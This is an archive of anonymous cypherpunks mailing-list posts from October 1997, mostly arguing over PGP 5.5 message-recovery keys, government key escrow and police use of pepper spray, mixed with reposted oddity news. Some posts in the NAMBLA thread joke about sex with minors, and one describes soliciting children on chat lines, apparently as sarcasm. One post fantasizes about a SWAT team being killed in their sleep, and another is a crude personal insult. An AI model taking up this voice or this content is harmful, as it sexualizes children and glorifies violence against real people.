 A. Before he invented penicillin, countless toreros died
of infected wounds. After, even the smallest arenas were
equipped with penicillin syringes. And the performances
became much more exhilarating. Said one cape artist: "Now
I can stand closer to the bull."

@_date: 1997-10-23 00:05:21
@_author: Anonymous 
@_subject: PGP 5.5 CMR/GAK: a possible solution 
Neat, automatic superencryption.
Could the same idea work with the Pgp method with the CMR key?  You
would encrypt to the user first, then reencrypt to the combination
of user and CMR key.
Would this prevent GAK?

@_date: 1997-10-23 06:48:06
@_author: Anonymous 
@_subject: We have to keep our keys for HOW long??? 
* The Wall Street Journal reported in July that the Environmental
Protection Agency has ordered 71 mining companies in Idaho to
submit copies of all of the paperwork they have produced in the last
117 years.  EPA says it needs the information to help determine
who is responsible for lead pollution in Idaho's Silver Valley. According to the president of one firm, the order was so crazy that
the EPA investigators "must not live on this planet."  Another
pointed out that there are not enough copy machines in the region
to handle the work. To read these News of the Weird newspaper
columns from the past six months, go to
(That site contains no graphics, no photos, no video clips, no
audio.  Just text.  Deal with it.)

@_date: 1997-10-23 06:56:59
@_author: Anonymous 
@_subject: puff pieces vs tough crypto issues (Re: Singapore TOILET ALERT) 
I believe that Declan may be trying to keep things in perspective,
by reminding us who the actual users of "widespread crypto" will
be, GAK or no GAK.
As a matter of fact, Declan and I are counting on you to explain
the issues involved to our good friend and neighbor, Debbie (details
below), and get back to us with her thoughts on the crypto issues
which are relevant, from her perspective.
* At a celebrity auction in May, Debbie Dacoba of Paw Paw,
Mich., bid $8,625 for a pair of Mr. Ed's horseshoes and was so
overcome with joy when she won that she had to retreat to the
ladies' room for 20 minutes until she stopped crying.  Later she told
a reporter that she would keep the horseshoes in plastic because
specks of brown residue in the nail holes "could be manure, which I
hope it is because then I have a piece of him." To read these News of the Weird newspaper
columns from the past six months, go to
(That site contains no graphics, no photos, no video clips, no
audio.  Just text.  Deal with it.)

@_date: 1997-10-24 04:09:23
@_author: Anonymous 
@_subject: PGP Employee on MKR 
Mark, just remove the self signature on the user key.  The message
recovery key packet goes away!  That's all you have to do.  Is that
so tough?  This big threat, the dangerous CMR key, turns out to take
two seconds of user actions to be destroyed.  Something this easy to
turn off will never be good enough for GAK.
People say, "Oh, but then the government will make everybody run the
policy enforcer and reject any mail not encryped to the government."
First, if they were going to do this, they could do it with old versions
of PGP too.  Multiple recipients have been around practically forever.
Second, it's a ridiculous idea which ignores how email works.  More and
more people are running systems at home which could send and receive
SMTP mail.  The trend is towards home servers which support the multiple
home computers people will have in the next decade.  There's no way to
make those people run filters!
People say, "Oh, but they'll make it illegal to receive mail at home
without going through an ISP."  I'm serious, this has actually been
suggested on this list.  It has to be suggested, because it's the only
way this incredibly stupid scenario could be made to work.  I can only
assume that people are blinded by emotions or they wouldn't suggest such
a bizarre idea.
Making it illegal to implement probably the most widely used internet
protocol package (email) would be a totally unprecedented, invasive,
unjustifiable and unenforcable intervention by government.  If the only
way the government can enforce GAK is by making it illegal for people to
receive email through paths which don't pass through government filters
we can all rest easy, because it will never happen.
Even for the cases where filtering is done (like businesses), there are
easy countermeasures, described by no other than Jon Callas, PGP's chief
scientist!  Why would he say this if there were a massive conspiracy to
enable GAK?  He's also the one who explained the point above about the
self signature.  He has suggested two other easy workarounds:
Modify the PGP 5.0 source to put a fake recipient block on it.  How many
companies release their source so that you could do this?
Or superencrypt to the real end user, like you suggested in your scheme.
Why is this OK as a privacy workaround for your idea but it doesn't
count for PGP?
Then people say, "Oh, but PGP shouldn't have written the SMTP filter
anyway (or at least they shouldn't have put that one policy in) because
it would make it easier for the government to make everybody use it."
Ignoring all the considerations above about what a stupid idea this is,
the fact is that a simple filter like this is incredibly easy to write.
I'm sure a skilled Perl hacker like Adam Back could put together something
to check that a PGP message is encrypted to a desired key in a few hours.
There are already Perl scripts out there to help parse PGP messages.  You
just have to look at the recipients and compare with the key you want to
The existence of such a filter is totally insignificant in the big
picture.  If we are ever forced into a GAK system and filtering turns
out to be a part of the picture, it will be trivial for such filters to
be created.  PGP's SMTP product will not make any difference one way or
the other.
The fact is, nobody has come up with a scenario where PGP's CMR feature
can be turned into GAK in any practical way.  They have to assume that all
kinds of changes and additions are made - inability to remove CMR keys,
forcing everyone to run SMTP filters, making it illegal to receive email
at home, preventing people from implementing clients with workarounds,
changing the technology to make it harder to implement workarounds
using binding cryptography.  Any system can be turned into GAK if you're
allowed to postulate these kinds of changes.  And the fact is that every
GAK system so far designed can be trivially defeated.
The big GAK danger has always been that the encryption manufacturers
would release GAK-only versions of their software, so that you have a
choice between an easy to use system with GAK support, or a difficult
and balky product like PGP 2.6.2, distributed via underground means and
with GAK workarounds.  Now at last you can be sure that even if the very
worst happens, you will at least have the convenience and ease of use of
PGP 5.0 as the GAK disabled product, via a non-GAK international version.
This doesn't have anything to do with PGP's policies or motives; it is
strictly because of PGP 5.0's source distribution, which will make it
easy for cypherpunks to modify it to look compliant with GAK while using
superencryption or some other technology to avoid it.
No longer will it be a choice between convenient GAK or clumsy non-GAK,
opening the latter option only to cypherpunks and hackers.  Now people
opposed to GAK will be guaranteed an option of making their software at
least as easy to use as PGP 5.0.  If source code becomes available for
PGP 5.5, that will raise the guaranteed ease of use of non-GAK software
even further (by all accounts, 5.5 has an even better interface than 5.0).
The existence of these products in source code form will forever stand
as a barrier to any hope to coax (most) people into using GAK software
by forcing it into built-in products, leaving the alternative of non-GAK
software only to a tiny minority.  This in itself should monkey wrench
any government plans for requiring GAK.

@_date: 1997-10-24 07:18:25
@_author: Anonymous 
@_subject: PGP Employee on MKR 
What is sad is that people who are capable of expositing their beliefs
in a clear and coherent way choose instead to stoop to name calling.
Wouldn't it be more effective to explain exactly how our views are
"silly"?  If what you say makes sense, some of us may even agree with
You describe PGP's achievement as "an awsome hack on corporate
America".  Yet, Jason Bobier, an employee of PGP, Inc. says "_All_ of
the developers at PGP are personal privacy zealots and no one likes
the idea of the MRK."
What is it that has Jason and his friends concerned?  Clearly there
are legitimate concerns and some people inside PGP, Inc. have them
like everyone else.
For that matter, why was it that Phil Zimmermann spoke out against
exactly this sort of product not so long ago?  What was it that
concerned Phil?  Why is this concern no longer relevant to the point
of being "silly"?
While we are at it, why was it that we didn't like Clipper?  After
all, its use was entirely voluntary and it would have disseminated
crypto widely.  In many instances, it would actually be preferable to
'PGP for Business' because the Feds wouldn't be tattling to your
employer if you were considering employment elsewhere or complaining
about your boss.
'PGP for Business' doesn't have the government's key built in, but the
infrastructure is all there.  It will get people accustomed to the
idea that it is reasonable to be under constant surveillance by your
employer, an idea which is easily extended to other listeners.  And
we've already seen members of Congress using 'PGP for Business' to
justify GAK.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-24 13:53:59
@_author: Anonymous 
@_subject: Spoofing 
I already cracked it.
The message is: "Sorry, but we ran out of cash."

@_date: 1997-10-25 03:30:34
@_author: Anonymous 
@_subject: GAK on the cheap 
GAK fans!
Here's a patch to PGP 2.6.2 to force it to encrypt all messages to the
FBI key.
Patch crypto.c thusly:
That's it.  Four new lines, and every message is encrypted to the
government as an additional recipient.
Don't let the FBI see this.  If so, we'll be  "one step from
GAK".  Add a few SMTP filters and we're doomed.

@_date: 1997-10-26 01:30:27
@_author: Anonymous 
@_subject: Office of the Secretary of Defense vs the First Amendment 
Someone is vastly over-reacting.  I read this letter as a polite request
to do what they think is the "right thing" along with some reasons
intended to gently persuade you that this is a morally correct choice. There is no threat.  No hint of compulsion.  It is IMHO utterly legal and
Just as it would be utterly legal to comply with or ignore this
letter. (Appropriateness we could debate...)
No foul.
A. Michael Froomkin         +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law  remailed to foil spam
U. Miami School of Law      froomkin =A=T= law.miami.edu
P.O. Box 248087             Coral Gables, FL 33124 USA  It's quite warm here

@_date: 1997-10-26 03:22:25
@_author: Anonymous 
@_subject: PGP Employee on MKR 
It sounds like everybody is in agreement, then.  Companies have the
right to ask their employees to give up some privacy, time, and
effort.  You are arguing that many employees will opt to give up their
privacy rights because that choice is preferable to the others they
perceive.  Because there is a large number of such people, it is
likely that large numbers of people will become accustomed to giving
up their privacy and will be sympathetic when other people are forced
to give up their privacy.
Where there may be some disagreement is whether the solution is to
pass even more laws that restrict what choices people may make
or to pursue other solutions.
Given that the governments of the world are the source of nearly all
privacy problems, it seems unlikely that an appeal to government is
likely to be productive.
Monty Cantsin
Editor in Chief
Smile Magazine

@_date: 1997-10-26 05:43:20
@_author: Anonymous 
@_subject: Use of an 'air freshener' in commission of a crime... 
* In June, a Scripps Howard News Service reporter examined
Consumer Product Safety Commission records recently made
public and found that 1,823 serious injuries caused by "electronic
air-fresheners" had been reported to the agency.  Though the
records were short on details, they included 50 cases of amputation,
46 burns, 48 scaldings, 68 poisonings, 56 "foreign-body"
penetrations, and 69 "drownings." To read these News of the Weird newspaper
columns from the past six months, go to
(That site contains no graphics, no photos, no video clips, no
audio.  Just text.  Deal with it.)

@_date: 1997-10-26 05:43:20
@_author: Anonymous 
@_subject: Great Balls of Fire! 
* In April in Port Washington, Wis., Kevin Gillson, 18, was
convicted of sexual assault of a child when his 15-year-old
girlfriend became pregnant, despite the fact that the couple were
attending parenting classes together and that Gillson said they
planned to marry.  Upon conviction, Gillson was barred from being
around any non-adults, including the mother of his child.  And
Richard A. Duke Jr., 22, was jailed for 30 days in May in St. Mary's
County, Md., for having sex with the 15-year-old girl whom he had
married in the interim between arrest and conviction.  Nonetheless,
a judge ordered Duke, thus as a sex offender, to stay away from the
girl, even though she is his wife.

@_date: 1997-10-26 05:44:08
@_author: Anonymous 
@_subject: Shit happened... 
* The Michigan Court of Appeals in April ruled, on a technicality,
in favor of a prison inmate who had tossed a cup of liquified feces
in the face of a guard.  Alphonso Gaines, 34, already serving time
for assault, could not be punished further, said the court, because
the prosecutors forgot to prove that Gaines was "lawfully"
incarcerated in the Ionia facility at the time he threw the feces. Prosecutor Gail Hitchcock was incensed:  "Did they think we were
charging someone who had sneaked into prison?" To read these News of the Weird newspaper
columns from the past six months, go to
(That site contains no graphics, no photos, no video clips, no
audio.  Just text.  Deal with it.)

@_date: 1997-10-26 05:44:13
@_author: Anonymous 
@_subject: Terry Nichols gets new court-appointed lawyer... 
* Defense lawyer Phillip Robertson, intending to make a dramatic
point in front of the jury at his client's robbery trial in Dallas,
in June, pointed the 9mm pistol used in the crime toward the jury
box, causing two jurors to fling their arms in front of their faces and
others to gasp audibly.  Though Robertson was arguing that his
client should be sentenced only to probation, the horrified jury gave
him 13 years.

@_date: 1997-10-26 19:00:59
@_author: Anonymous 
@_subject: Secure envelopes 
The only `culture' Timmy May possesses is that cultivated from his foreskin scrapings.
   \|/
  (*,*) Timmy May
 _m_-_m_

@_date: 1997-10-27 07:33:24
@_author: Anonymous 
@_subject: NAMBLA embattled -- mirror sites? 
Nah, I'll pass on this one. If the membership list is included, I'd be glad
to forward it to my local police, though...
I'm not sure the right to free speech includes the right to endorse guys
fucking little boys, whether they give it a moniker like "transgenerational
love" or not. Any sex with a minor is rape, since they can't legally give
consent. All Hillary Klinton's "It Takes A Village" bullshit aside, I can't
see giving NAMBLA the same kind of protection as someone like Zundel.

@_date: 1997-10-27 09:43:51
@_author: Anonymous 
@_subject: NAMBLA embattled -- mirror sites? 
I am being in agreement with Mr. Ratbert, here.
I am seeing the writing of women in your country who write about the
showing of their bare legs and the uncovering of their faces and I
am thinking that this also should not get the protection of being
able to write about such abominations.
And making the rape with minors is also an abomination, unless you
have bought them from their families, and then it is OK that you
should write about it.
I am stoning to death just last week a man who raped a ten year old
girl without paying any dowry, and people should not write about this
I would like to meet some cypherpunks girls with their faces uncovered
sometimes, but just for the evening, OK?
Mr. Ratali

@_date: 1997-10-27 15:01:27
@_author: Anonymous 
@_subject: cryptographic anecdotes 
I was so inspired by this guy that I had the source to sendmail tattooed on
my back and the source to emacs tattooed on my left thigh. I then figured
out I missed the point, this was supposed to be a political statement, so I
had the entire contents of the nambla web site tattooed on my left forearm.
Dont worry about mirroring it, if anyone wants to know whats on the namble
site they can visit me in jail where I am currently getting a crash course
in man-boy love.

@_date: 1997-10-28 03:27:23
@_author: Anonymous 
@_subject: Tim's worst nightmare 
> Woman in Standoff Shoots at Police
 > Filed at 10:12 a.m.  EST
 > By The Associated Press
 > ROBY, Ill.  (AP) -- Gunfire rang out again at the home of a
 > woman involved in a month-long standoff with authorities who
 > have a court order to bring her in for psychological testing.
Just imagine a few hundred (or thousand) people getting together in
Roby, Ill., defying the police-ordered half mile ban around her
house and sitting down peacefully between her and the police...

@_date: 1997-10-28 06:04:39
@_author: Anonymous 
@_subject: NABMLA embattled -- mirror sites? 
That's right. People who are too lazy to drive a fourteen year old
to New Mexico, where they can legally fuck their brains out, should
go to jail for a long, long time.
When I cruise the children's chat lines, I always tell them I would
like to meet them in New Mexico and fuck their brains out. That's
What I love about the law is that it gives us clear guidelines to
help us recognize the difference between those filthy fucking
child-molesting perverts fucking fourteen year olds in California,
and the decent, upstanding citizens fucking the fourteen year
olds in New Mexico.
God Bless America,

@_date: 1997-10-28 06:11:28
@_author: Anonymous 
@_subject: Fucking Minors / Re: NABMLA embattled -- mirror sites? 
I would like to remind George Spelvin (if that is your  *real* name)
that is improper Netiquette to reply to your own anonymous posts
before they have even arrived to the mailing list to which they were
While the Mandatory/Voluntary Netiquette rules are unclear in regard
to those with psychic abilities responding to the posts of others
before they arrive at the mailing list, I am certain that the concept
is the same.
  This is patently ridiculous!
  How do you know for certain that 'Anonymous' is not the person's
*real* name? And how do we know that Anonymous is not physically
*at* REPLAY.COM? Point to it on a map for me, why don't you?
  For that matter, how do we know that George Spelvin is *your*
real name? And how do we know if you are physically at dev.null?
  I think that others on the list will agree with me that your logic
is lame, and your arguments are ridiculous.

@_date: 1997-10-28 07:21:20
@_author: Anonymous 
@_subject: Microsoft's CMR Keys 
Hash: SHA1
Tim May, or someone like him, Wrote: Here's the public key (that _was_ what you asked for, wasn't it? :-)
If you'd like the private key, please enclose $25,000 in small unmarked
Mark Twain digicash encrypted to the CMR key, mailed to billg at microsoft.com,
with Subject: Testing Message Recovery, Please Ignore
and I'll get back to you RSN.

@_date: 1997-10-28 09:01:47
@_author: Anonymous 
@_subject: Theory of the Day!! 
Checked your headers. Turns out, the above is yesterday's theory.
  Nice try.
L. Dietweler

@_date: 1997-10-28 12:16:24
@_author: Anonymous 
@_subject: No Subject 
" If passed, the traditional hamfest flea markets where all sorts
of bizzare old radio junk gets traded for cash or swapped for other
gear will be largely a thing of the past, as almost all radio receivers
and transcievers that hams and other electronic hackers might want to
sell or trade will be seriously illegal, and one never knows who that
anonymous cash customer really is..."
The odds are very good that as technology increases the power & freedom of individuals to make an end run around the state that the state will increasingly make the effort to stop it.
This could get really ugly in the future.  Indeed, it has already, but most are not awake enough to notice. Devolution or the demise of the central power is a dangerous process to be caught up in.
In the case of the fedgov, it has a lot of power to abuse and I expect that the latest encryption fight is just a warmup. If the crooks & criminals in the intelligensia can't get their way legally,
then their only option is "any means possible." That covers a lot of territory.
Insure youself against the state. The King likes it *his* way.
A. From the Cyber-Jurisdiction

@_date: 1997-10-28 12:32:44
@_author: Anonymous 
@_subject: PGP 5.5 available outside US 
I installed it. It seems to automatically encrypt everything to Lucky.

@_date: 1997-10-28 23:47:37
@_author: Anonymous 
@_subject: NABMLA embattled -- mirror sites? 
Excellent! So have NAMBLA move their HQ to New Mexico. Then they can talk
about fucking little boys' brains out to their heart's content, in person
or on their Web site, without breaking any local laws.
Welcome to the Fifty Fiefdoms. Of course, there'll be changes in the next revision of the Constitution:
  1) The First, Second, Fourth and Fifth Amendments will be missing.
  2) The Tenth Amendment will be altered so that the it says:
     "The powers not delegated to the United States by the Constitution,
     nor prohibited by it to the States, are reserved to the States
     respectively, or to the people -- unless we feel like usurping them,
     or we can convince people they don't need them by spreading FUD."

@_date: 1997-10-29 03:44:44
@_author: Anonymous 
@_subject: ITAR a la Canada 
Anyone know if Canada has accepted all of the restrictions
under ITAR?
Specifically, U.S. companies must (I assume) identify your
domain before permitting access to restricted versions of
software.  Does the same apply for Canada?

@_date: 1997-10-29 06:57:57
@_author: Anonymous 
@_subject: Kids...don't try this at home! / Re: Roby latest 
I know what you're thinking, kid.
You're thinking, "I'm going to try doing this on Halloween, and if I
get caught, I'm going to tell mom and dad I was checking on the old
lady's health."
Forget it. You don't have a badge, and you're going to get your
bottom tanned.

@_date: 1997-10-29 08:52:57
@_author: Anonymous 
@_subject: Use a Mac...Go to Jail / Re: Saving money 
I have always envisioned Mac users as sitting at their computers and
drawing flowers while they bounce a cute baby on their knee.
Lately, however, I have seen increasing militantism from a wide variety
of Mac users, from the quote above to "MacNuke DC" ranters.
Is this a 'Death of the '60's' thing, or a sign of 'Armageddon'?

@_date: 1997-10-29 12:12:19
@_author: Anonymous 
@_subject: I don't need no steenking badge...but I got one anyway 
Indeed, many of the so-called 'off-topic' missives sent to the CPUNX
list actually deal with the heart of cryptography/key-identity, namely,
"face value claims of" authority/identity.
  e.g.
  Why do the average citizens put up with behavior from legislators and
law enforcement agents that they would not tolerate in their children?
  It is because of the 'forged keys' of authority that they have uploaded to the mainstream media servers...
  "As an unelected member of an organization created by executive
   decree, I am happy to accept the reins of power."
  ...and because of the public misconception that a 'valid key' confers
some kind of real authority or integrity on its owner...
  "Real officers?"
  There was a 60 Minutes show recently on "real officers" who rape and
murder the citizenry under cover of their badges.
  {How does this relate to cryptography? Glad you asked...}   Who do I send my GAK key to?   To the "real officer" who sexually molested and/or raped over a hundred citizens under the cover of authority?
  To the "real officers" who fired this guy when his activities came
to light, but gave him glowing letters of recommendation so that he
could move to other law enforcement agencies to continue his criminal
  To the "real officers" who rape and murder the citizens?
  To the hundreds/thousands/tens-of-thousands of "real officers" who
use their access to LEA databases to get the names and addresses of
citizen/victims in order to murder, rape and rob them?
AnonymousPoliceOfficerRobberRapistMurderer, swearing Piece-of-Ass   Officer, Anytown, USA

@_date: 1997-10-29 12:54:17
@_author: Anonymous 
@_subject: PGP and Outlook 
We could tell you, but then we'd have to killfile you...

@_date: 1997-10-29 17:57:33
@_author: Anonymous 
@_subject: Where are the tough guys when we need them? 
I can't help wondering if some former SPECWAR guy somewhere out there who took his oath seriously, just one, may not get a little sick of watching this stuff on the news and give the old lady a present and the Nazis a message one morning... a SWAT team sleeping the eternal sleep at their posts, their necks having been mildly adjusted during the quiet night.
"Whatcha gonna do when they come for you, come for you...?"

@_date: 1997-10-29 23:41:08
@_author: Anonymous 
@_subject: Freeh agitating again 
*** FBI chief calls for computer crime crackdown
FBI director Louis Freeh said Tuesday that criminals were moving
increasingly into cyberspace and without new laws "drug dealers, arms
dealers, terrorists and spies will have immunity like no other".
Freeh told the International Association of Chiefs of Police that
software manufacturers should be required by law to include a feature
that allows police to descramble encrypted communications. Freeh said
he supported a cyber surveillance law with these features which
passed out of the House Intelligence Committee. For the full text
story, see

@_date: 1997-10-30 08:28:42
@_author: Anonymous 
@_subject: Location of PGP 5.0 
Where can I find a copy of PGP 5.0 which handles this "SHA1" hash extension,
and the new forced incompatabilities? I'm looking for a Linux distribution.
All I've found are Windoze versions, really old betas which break
*everything* which calls PGP from a script or command line, and betas which
have a lame expired timebomb in them. Source is prefered for obvious reasons.
Any ideas? (Yes, I'm in the U.S.)

@_date: 1997-10-30 11:13:04
@_author: Anonymous 
@_subject: new intel verification circuit & crypto 
InfoWarriors around the globe have already been preparing for
'The Son of Clipper' and 'The Daughter of GAK'.
The defenders of Freeh-Dumb know that the key to totalitarian
access to communications/information is to slip in the back
door of new technolgies via those who develop and produce that The anti-trust actions against Intel are for the purpose of
negotiating a foothold in programmable CPU's, etc.
The anti-trust outrage against MicroSoft is meant to be a
million-dollar-a-day punishment for reneging on their deal
to provide GAK hooks in Internet Explorer 4.0.
Look for MS and Intel to string the government along in this
regard, while delaying long enough to let the Y2K problem force the government's hand in their desire for total control
of the Information Highway Robbery system.
The battle is for control of the New Electronic Jerusalem.
Your 'other brother' Deitweler

@_date: 1997-10-30 12:38:49
@_author: Anonymous 
@_subject: No Subject 
Either Klintonkov, the congresscritters, and the directors of everyone's favorite TLAs have *COMPLETELY* lost their marbles, or the word 'constitution' is about to become very un-PC.  Get your plane tickets to countries where sanity still remains (if there are any left) before international air travel is suddenly banned because of 'terrorist threats to national security'.
War is Peace.  Freedom is Slavery.  Surveilance is Security.  I'm from the government and I'm here to help you.

@_date: 1997-10-31 03:55:29
@_author: Anonymous 
@_subject: GAK for PGP 2.6.2 
GAK fans!
Here's a patch to PGP 2.6.2 to force it to encrypt all messages to the
FBI key.
Patch crypto.c thusly:
That's it.  Four new lines, and every message is encrypted to the
government as an additional recipient.
Don't let the FBI see this.  If so, we'll be  "one step from
GAK".  Add a few SMTP filters and we're doomed.

@_date: 1997-10-31 07:33:09
@_author: Anonymous 
@_subject: DEA trying to subpoena book dealers 
What are you doing sleeping naked? You should *always* sleep fully

@_date: 1997-10-31 11:05:08
@_author: Anonymous 
@_subject: North CA cops skip preliminaries, get straight to torture 
North CA cops skip preliminaries, get straight to torture
CBS news tonight showed cops in a northern CA town use swabs to apply
"pepper spray" directly to the eyes of demonstrators in some Congressman's
office. One cop administered headlocks, another pried eyelids open and a
third administered discipline.
That's the ticket. Skip the judge and jury, just let the
cops torture the perps.  Why stop at pepper spray?  Why not bamboo shoots?
Electric shocks to the genitals?  We must have order.
Glad none of those human-rights protestors in DC will care.  And none of
those left-wing-commie-pinko llllliberals. And none of those right-wing

@_date: 1997-10-31 12:22:53
@_author: Anonymous 
@_subject: North CA cops skip preliminaries, get straight to torture 
The manufacturer of the pepper spray used warns that it should be
used from a minimum of three feet away, as closer use will result
in tissue damage.
  Videos show the police spraying it directly in the non-violent
demonstrators eyes from inches away.
  Naturally, even if they shot the non-violent demonstrators in
the eye from inches away, with their guns, they would be provided
with a taxpayer-supported legal team to claim that the officers were in fear for their lives from seated, handcuffed, unarmed,
non-violent demonstrators.
  If I trespass on Tim's property, I would fully expect him to
deal with me in a manner consistent with his declared intentions.
I would expect the same from those who claim to be bound by the
same rule of law that they _force_ on the citizens.
  This non-violent demonstrators were willing to accept the agreed
upon punishment/cost of their actions in protest of the actions
of their public servants. Their public servants, as usual, chose
to to act in the manner of savages who are incapable of holding
to the rule of law which they use to justify their confiscation
of the citizen's right to bear arms in the face of tyranny.
  Twenty years or so ago, after seeing pictures of mothers and
children in chains at a Livermore Labs protest, I wrote a song
called "Don't Blame Me, I Voted For The Monkey."
  If more people had followed my example, we would be singing the praises of government, as Bozo sits in the Oval Office
typing new legislation which would likely be far superior to
anything we have seen in the last twenty years.
  "Time flies like an arrow...fruit flies like a banana."

@_date: 1997-10-31 13:11:31
@_author: Anonymous 
@_subject: North CA cops skip preliminaries, get straight to torture 
On the third page of Brisbane's Courier Mail yesterday, "Policeman Accused
of Assaulting Rape Witness Promoted." "Any weapon must be kept concealed until the exact moment of its use"

@_date: 1997-10-31 14:27:41
@_author: Anonymous 
@_subject: Thanks to AnonyMace, we know: / Re: North CA cops skip preliminaries, get straight to torture 
Chemical Mace,
A trademark for a mixture of organic chemicals used in aerosol form as a
to disable with intense burning pain, blepharospasm, acute bronchitis,
respiratory irritation.
                   -- "American Heritage Dictionary", 1991
  i.e. - The police in Humboldt county used 'weapons' against peaceful
Mace is an aerosol weapon (tear gas) that is used to disable violent
  i.e. - ibid.
What Is Mace Made Of? (Formulations)
     CN (Original Mace)      CS      CN/OC Blend      CS/OC Blend      OC 5.5%      OC 10%      OC Foam CN -- Chloracetophenone (Lacrimator Agent)
     Relatively toxic
     Fast Acting (Upper Respiratory Tract, Lachrymatory, Eyes)      Irritating to the Skin (burning and itching sensation) CS -- Orthochlorbenzalmalononitrle (Lacrimator Agent)
Extreme burning of the eyes, and flowing tears      Stinging sensation on all moist skin      Tightness in the chest and throat (Lung and Bronchial Irritant) OC -- Oleoresin of Capsicum (Inflammation Agent)
     Severe involuntary closing of the eyes/Spasms of Eyelids      Severe burning of the eyes, and flowing tears      Intense pain on all exposed all skin   i.e. - The police *sentenced* unconvicted citizens to receive
the *punishment* of *severe* burning and *intense* pain by use
of *chemical warfare*.
How Does It Work?
CN and CS are both irritants and lacrimator agents...if it gets into the respiratory tract is causes severe coughing and choking.                                      ^^^^^^
For CN and CS to work effectively the person being sprayed must be able to feel pain
                ^^^^
OC on the other hand is a inflammation agent...it causes...the entire respiratory system to seize up and go into spasms.
  i.e. - Severe Pain and Spasms == Punishment
Any time you use Mace (or any kind of weapon) be prepared to defend yourself in civil or criminal court.
Spraying someone with Mace is (by legal definition) an assault,                                ^^^^^^^^^^^^^^^^^^^     ^^^^^^^
and you must be legally justified to spray someone.
You can easily go to jail or get sued for misusing a defensive ^^^^^^^^^^^^^^^^^^^^^^^^^             ^^^^^^^^^^^^  *^^^^^^^^^*    spray or any level of physical force.
  i.e. - If you are a *citizen-unit*.
Keep in mind that the use of any kind of defensive weapon could result in death.   i.e. - Do the police give a fat rat's ass if they kill the
      citizens by using *chemical warfare* when it is not
      necessary, except to perhaps 'teach someone a lesson'
      by sentencing them to be punished before trial? No.
When to Use - Use of Force Ladder
     Confrontational Avoidance      Physical Presence      Key Verbal Skills      Body Language - Assault is Imminent/Possible      Defensive Tactics/Martial Arts/C&R/Open Hand      Chemical Weapons      Impact Weapons      Edged Weapons      Firearms   i.e. - The word "defensive" is used, time and time again in this
      evaluation of the proper use of mace. The words *punishment*
      and *expediency* are, not surpsingly, absent from this       discourse.
[If you follow the links to the government material on the use of  these deadly chemical weapons, you will find constant references
 to "restraint" of "aggressive" individuals, and as an "alternative"
 to "physical violence."]
About the author:  [BTW, he's is trained in "Cryptanalysis"]
James M. Atkinson, is an internationally recognized leader and trainer
in the field
of Technical Surveillance Counter Measures (TSCM), Signals Intelligence
(SIGINT), Electronic Surveillance Technology, Telecommunications,
Acquisition and Analysis, Covert and Tactical Operations,
Computer and Communications Systems, High Speed Photonic Networking,
Security Locksmithing, Electronic Counterterrorism, Explosives
Chemical Weapons, Security Evaluation, and Consulting.
Mr. Atkinson has been trained by the U.S. Government in Intelligence,
Operations, Technical Surveillance, and Cryptanalysis. He is a graduate
of the
Defense Intelligence School and has extensive field experience in
military, technical
intelligence, and covert operations. He is a veteran with eight years of
active duty
military service, followed by two years of employment with a U.S.
agency, and holds a Top Secret security clearance.
He has completed advanced tactical training, and has been certified as
both an
Instructor and a Master Instructor of chemical weapons and is literally
the person
who "teaches the teachers".
Mr. Atkinson is also the author of numerous books, including multiple
titles related
to chemical weapons.

@_date: 1997-10-31 16:00:51
@_author: Anonymous 
@_subject: PGP 5.5 available outside US 
First, a PGP employee announces that PGP 5.5 is available for download.
Second, I try to download it a dozen times, only to have the connection
  broken each time, after outrageously long periods of waiting for an
  extremely slow transfer.
Third, PGP 5.5 disappears from the server.
Fourth, everyone I talk to tells me their attempt to download the
  file failed.
I don't _need_ PGP 5.5. I have a beta-test version of PGP 5.0 which
serves me rudimentarily well for my purposes. I would like to check
out PGP 5.5 in order to make a proper evaluation of the features
and technology involved, but it seems that it is not available for
this purpose.
PGP will undoubtedly survive without my support, but I find it sad
that after many years of supporting PGP products, I can no longer
do so with any amount of integrity.

@_date: 1997-10-31 17:27:13
@_author: Anonymous 
@_subject: Archives? 
Is there an archive of various papers concerning such things as Assassination
Politics, Eternity Servers, Reputation Capital, The Blowfish Cipher, CROWDS,
encryption of IP traffic, etc.?

@_date: 1997-10-31 18:27:39
@_author: Anonymous 
@_subject: North CA cops skip preliminaries, get straight to torture 
Perhaps I was unclear, but I was refering to the _ancient_ notion
that once one has crawled out of the primeval swamp and begun to walk
upright, that they should work on controlling their animal passions to
the extent that they abide by the agreements they have sworn to uphold,
regardless of whether the people they are being paid to serve have
pissed them off.
  Am I mistaken in my impression that they did not take over Intel's
factory? How is your mind holding up, Tim? Can you remember details
of your life that don't have to do with Intel?
  {Not that I haven't sunken in to remeniscing about my life during
   several posts today. I suppose it is only a matter of time until
   we are all Grouchy Old Cypherpunks inundating the list with posts
   about who died, who has prostrate cancer, and who broke their hip
   trying to close that darned new-fangled nuclear suitcase.}
  Do you know about some 'deal' of which I am not aware in this
or shall we discuss the _real_ events which took place in Humboldt?
  To tell the truth, I really don't have any problem with _you_ doing
so. I _would_ have a problem with the cops doing so, however, which is
a point I am trying to make.
  It may be the policeman's job and/or duty to arrest and imprison the
people involved, but it is in no way their duty or right to _punish_
the people by invoking a level of violence which is not necessary to
accomplish the job.
  I don't really care if it is _difficult_ for the policemen to deal
with the physical details of imprisoning the people. And I don't have
a lot of sympathy for the protesters if they get bumped and bruised
in the process of the police honestly doing their job. However, it
is unconscienable for officers to inflict pain and suffering on the protesters for no other reason than to punish them for making
the policeman's job difficult and defying authority.
  Such as dumping tea in Boston harbor to protest oppressive
  Fucking eh! I wish you had been in charge back then. I thought it
was ridiculous for LEA's to play to protesters desires by escalating
situations beyond what was really needed because of some perceived
threat to their authority.
  Say, that's not a 'red bandana' on your neck, is it?

@_date: 1997-10-31 18:29:13
@_author: Anonymous 
@_subject: PGP 5.5 available outside US 
I knew that! I must have eaten too many of the yellow ones tonight
to keep track of my Crayola lines. I'd better eat a couple more of the
red ones to get myself back on track.
  Thanks for the pointer, just the same.
  Oh, I see my mistake! I had Caesar, wearing a 'Toga', connected to
the anti-Christ with a red Crayola line, and mistook it for 'Tonga'.
  No problem, I'll just eat a couple of the brown Crayola's and throw
three Hail Flutie's.
Still Anonymous (except to Lucky)

@_date: 1997-10-31 19:18:11
@_author: Anonymous 
@_subject: Archives? 
Anonymous, worried that answering himself might lead to being
  incarcerated against his will for a mental evaluation, replies:
Tim C. May is a living archive of these issues and technologies, but
it is a bad idea to show up on his doorstep, unannounced.
However, it is sometimes possible to sneak into a website to be
found at  and get out alive with as much information
as you are capable of stuffing into your CyberPockets during your
